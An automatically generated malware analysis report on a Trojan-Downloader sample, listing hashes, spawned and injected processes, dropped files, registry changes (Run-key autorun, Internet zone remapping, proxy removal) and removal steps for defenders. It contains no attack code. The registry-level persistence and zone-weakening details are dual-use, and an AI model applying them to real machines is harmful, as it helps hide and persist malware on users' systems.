Trojan-Downloader.Win32.Adload.cfms (Kaspersky), Trojan.Generic.6764817 (B) (Emsisoft), Gen:Variant.Zusy.Elzob.3397 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.BHO.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 006a046dad50dfeff8f9b7e3b9719501
SHA1: a7fa25a328834c99ad8be22871f87b3ce969bb63
SHA256: 33d32bce8453a6aadce4e485a8e33792f6ef86fa3e729b1719e0590369aa6abf
SSDeep: 98304:06rnURbiRdDiuYH3C5IguxmSaTmzOI/tSI9bnkg7SHLTio/jvRUr:0NdSmdxmuz5scbn57SHiIRUr
Size: 5373952 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: PC Utilities Software Limited
Created at: 2011-09-24 15:44:20
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
net.exe:524
net.exe:1136
net1.exe:1360
net1.exe:1556
lhkmtqb.exe:592
%original file name%.exe:1488
lhkmtqb.exe:336
mscorsvw.exe:1912
RhdmcnkZlr.EXE:1560
The Trojan injects its code into the following process(es):
CqxpeonGez.EXE:904
FprqlspZxc.EXE:1288
svchost.exe:232
svchost.exe:992
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process lhkmtqb.exe:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\ lhkmtqb.exe (79104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE (51724 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RhdmcnkZlr.EXE (8308 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\DownRcord (780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c1[1].exe (51708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\c3[1].exe (7772 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\FprqlspZxc.EXE (14964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\auto[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].exe (14764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\RecordPath (0 bytes)
C:\%original file name%.exe (0 bytes)
The process FprqlspZxc.EXE:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\QQfm[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qlogin[1].htm (1714 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
The process %original file name%.exe:1488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\RCX7E.tmp (114025 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RecordPath (260 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe (39133 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe (0 bytes)
The process RhdmcnkZlr.EXE:1560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\all_async_popstate1_7b8ee197[1].js (9835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons_f72fb1cc[1].gif (5054 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\baidu[1].htm (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_logo1[1].png (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\nu_instant_search_1969bb02[1].js (17 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[1].txt (132 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\17434561[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.baidu[1].txt (127 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pz[1].htm (314 bytes)
%WinDir%\ime\appfht.exe (89 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[2].txt (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery-1.10.2.min_f2fb5194[1].js (3234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\baidu_jgylogo3[1].gif (705 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
Registry activity
The process CqxpeonGez.EXE:904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D4 C9 19 04 A3 A6 88 62 22 00 42 5C 5F 96 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process net.exe:524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 AB ED B9 EC 71 76 30 50 4E 81 47 3B E6 60 70"
The process net.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC BB 5F 7A A3 E0 C6 1F C0 65 43 F9 AE 9E 85 90"
The process net1.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 D0 1E 4D 80 FF CD CF 18 C3 F3 2A B5 CA 57 6E"
The process net1.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 D7 BE 41 8D 8F 18 F1 62 CC 80 3A 2F B2 61 3B"
The process lhkmtqb.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F AB 8F 11 F9 E9 8F E3 8D 77 D1 EF A9 1A 0B 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process FprqlspZxc.EXE:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014122820141229\"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CachePrefix" = ":2014122820141229:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 1C 98 FB B8 AE 14 93 C1 66 C9 E4 EC B2 C3 A2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CacheOptions" = "11"
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 34 7F 14 EA C5 0C 92 0E 30 17 6A 3E 9C 18 B9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process lhkmtqb.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 6C CB 69 D9 12 7C 81 14 E2 5B F5 4E FD 80 DF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"
The process RhdmcnkZlr.EXE:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\VB and VBA Program Settings\QQID\Value]
"QQID" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "RhdmcnkZlr.EXE"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1418021643"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 39 A4 B2 E7 70 50 37 B9 94 3A 82 B3 4D 8B 4B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RhdmcnkZlr" = "c:\windows\ime\appfht.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 7c856d99209e3a45a548a7017fe87173 | c:\Documents and Settings\All Users\Application Data\DownloadSave\ lhkmtqb.exe |
| caa4031258dd0af2aadfee60ab909abc | c:\Documents and Settings\All Users\Application Data\DownloadSave\CqxpeonGez.EXE |
| 55db4f3b5b28dbc176eea7bd195ff1a5 | c:\Documents and Settings\All Users\Application Data\DownloadSave\FprqlspZxc.EXE |
| 7c856d99209e3a45a548a7017fe87173 | c:\Documents and Settings\All Users\Application Data\DownloadSave\lhkmtqb.exe |
| caa4031258dd0af2aadfee60ab909abc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c1[1].exe |
| 55db4f3b5b28dbc176eea7bd195ff1a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].exe |
| b03789a726a2e0d65fe581fb6afc4b17 | c:\WINDOWS\system32\chrome.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net.exe:524
net.exe:1136
net1.exe:1360
net1.exe:1556
lhkmtqb.exe:592
%original file name%.exe:1488
lhkmtqb.exe:336
mscorsvw.exe:1912
RhdmcnkZlr.EXE:1560 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\DownloadSave\ lhkmtqb.exe (79104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE (51724 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RhdmcnkZlr.EXE (8308 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\DownRcord (780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c1[1].exe (51708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\c3[1].exe (7772 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\FprqlspZxc.EXE (14964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\auto[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].exe (14764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\QQfm[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qlogin[1].htm (1714 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RCX7E.tmp (114025 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RecordPath (260 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe (39133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\all_async_popstate1_7b8ee197[1].js (9835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons_f72fb1cc[1].gif (5054 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\baidu[1].htm (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_logo1[1].png (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\nu_instant_search_1969bb02[1].js (17 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[1].txt (132 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\17434561[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.baidu[1].txt (127 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pz[1].htm (314 bytes)
%WinDir%\ime\appfht.exe (89 bytes)
